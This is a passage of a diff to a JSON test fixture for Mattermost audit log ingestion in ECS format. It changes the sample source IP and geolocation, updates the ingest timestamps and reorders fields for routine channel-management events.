"Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/posts", - "original": "/api/v4/posts" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:28:19.342Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209503901Z", - "original": "{\"timestamp\":\"2021-12-04 23:28:19.342 Z\",\"event\":\"createPost\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/posts\",\"post\":{\"id\":\"gbuu48qc17bbjq4xdg5ciq4iao\",\"channel_id\":\"hkmb8e53ijdkbc8agbpuxe8qxc\",\"type\":\"\",\"pinned\":false},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543288767Z", + "original": "{\"timestamp\":\"2021-12-04 23:28:19.342 Z\",\"event\":\"createPost\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/posts\",\"post\":{\"id\":\"gbuu48qc17bbjq4xdg5ciq4iao\",\"channel_id\":\"hkmb8e53ijdkbc8agbpuxe8qxc\",\"type\":\"\",\"pinned\":false},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "createPost", "category": [ @@ -762,6 +782,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/posts", + "original": "/api/v4/posts" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -774,9 +798,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:01:23.974Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { @@ -800,45 +839,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels", - "original": "/api/v4/channels" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:01:23.974Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209509119Z", - "original": "{\"timestamp\":\"2021-12-05 00:01:23.974 Z\",\"event\":\"createChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543290184Z", + "original": "{\"timestamp\":\"2021-12-05 00:01:23.974 Z\",\"event\":\"createChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "createChannel", "category": [ @@ -852,6 +875,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels", + "original": "/api/v4/channels" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -864,9 +891,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:01:48.946Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "patch": { @@ -895,45 +937,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch", - "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:01:48.946Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209544031Z", - "original": "{\"timestamp\":\"2021-12-05 00:01:48.946 Z\",\"event\":\"patchChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"patch\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543291555Z", + "original": "{\"timestamp\":\"2021-12-05 00:01:48.946 Z\",\"event\":\"patchChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"patch\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchChannel", "category": [ @@ -947,6 +973,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch", + "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -959,9 +989,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:01:52.914Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { @@ -985,45 +1030,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe", - "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:01:52.914Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209552229Z", - "original": "{\"timestamp\":\"2021-12-05 00:01:52.914 Z\",\"event\":\"deleteChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe\",\"channeld\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543293159Z", + "original": "{\"timestamp\":\"2021-12-05 00:01:52.914 Z\",\"event\":\"deleteChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe\",\"channeld\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "deleteChannel", "category": [ @@ -1037,6 +1066,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe", + "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1049,7 +1082,10 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "mattermost": { @@ -1075,22 +1111,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "error": { "code": "api.channel.delete_channel.deleted.app_error" @@ -1111,7 +1150,7 @@ "ag99yu4i1if63jrui63tsmq57y" ], "ip": [ - "55.33.6.7" + "89.160.20.156" ] }, "http": { @@ -1120,8 +1159,8 @@ } }, "event": { - "ingested": "2021-12-08T15:26:55.209557854Z", - "original": "{\"timestamp\":\"2021-12-05 00:02:01.482 Z\",\"event\":\"deleteChannel\",\"status\":\"fail\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe\",\"channeld\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"code\":400,\"err\":\"api.channel.delete_channel.deleted.app_error\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543294566Z", + "original": "{\"timestamp\":\"2021-12-05 00:02:01.482 Z\",\"event\":\"deleteChannel\",\"status\":\"fail\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe\",\"channeld\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"code\":400,\"err\":\"api.channel.delete_channel.deleted.app_error\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "deleteChannel", "category": [ @@ -1173,22 +1212,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "error": { "code": "app.channel.update.bad_id" @@ -1209,7 +1251,7 @@ "ag99yu4i1if63jrui63tsmq57y" ], "ip": [ - "55.33.6.7" + "89.160.20.156" ] }, "http": { @@ -1218,8 +1260,8 @@ } }, "event": { - "ingested": "2021-12-08T15:26:55.209563426Z", - "original": "{\"timestamp\":\"2021-12-05 00:02:09.835 Z\",\"event\":\"convertChannelToPrivate\",\"status\":\"fail\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"code\":400,\"err\":\"app.channel.update.bad_id\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543296002Z", + "original": "{\"timestamp\":\"2021-12-05 00:02:09.835 Z\",\"event\":\"convertChannelToPrivate\",\"status\":\"fail\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"code\":400,\"err\":\"app.channel.update.bad_id\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "convertChannelToPrivate", "category": [ @@ -1256,6 +1298,18 @@ } }, { + "@timestamp": "2021-12-05T00:02:25.202Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { @@ -1279,45 +1333,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore", - "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:02:25.202Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209568764Z", - "original": "{\"timestamp\":\"2021-12-05 00:02:25.202 Z\",\"event\":\"restoreChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543297343Z", + "original": "{\"timestamp\":\"2021-12-05 00:02:25.202 Z\",\"event\":\"restoreChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "restoreChannel", "category": [ @@ -1331,6 +1369,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore", + "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1343,9 +1385,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:02:31.485Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { @@ -1362,52 +1419,36 @@ ] }, "api_path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert", - "session": { - "id": "mbz8h4gkxp8g3yzanizcpg43dc" - } - } - }, - "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" - } - }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert", - "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:02:31.485Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "session": { + "id": "mbz8h4gkxp8g3yzanizcpg43dc" + } + } + }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", + "location": { + "lon": 15.6167, + "lat": 58.4167 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209574037Z", - "original": "{\"timestamp\":\"2021-12-05 00:02:31.485 Z\",\"event\":\"convertChannelToPrivate\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543298812Z", + "original": "{\"timestamp\":\"2021-12-05 00:02:31.485 Z\",\"event\":\"convertChannelToPrivate\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "convertChannelToPrivate", "category": [ @@ -1429,6 +1470,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert", + "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1441,9 +1486,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:02:56.786Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { @@ -1467,45 +1527,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y", - "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:02:56.786Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209585637Z", - "original": "{\"timestamp\":\"2021-12-05 00:02:56.786 Z\",\"event\":\"removeChannelMember\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"P\"},\"remove_user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543300307Z", + "original": "{\"timestamp\":\"2021-12-05 00:02:56.786 Z\",\"event\":\"removeChannelMember\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"P\"},\"remove_user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "removeChannelMember", "category": [ @@ -1522,6 +1566,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y", + "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y" + }, "user_agent": { 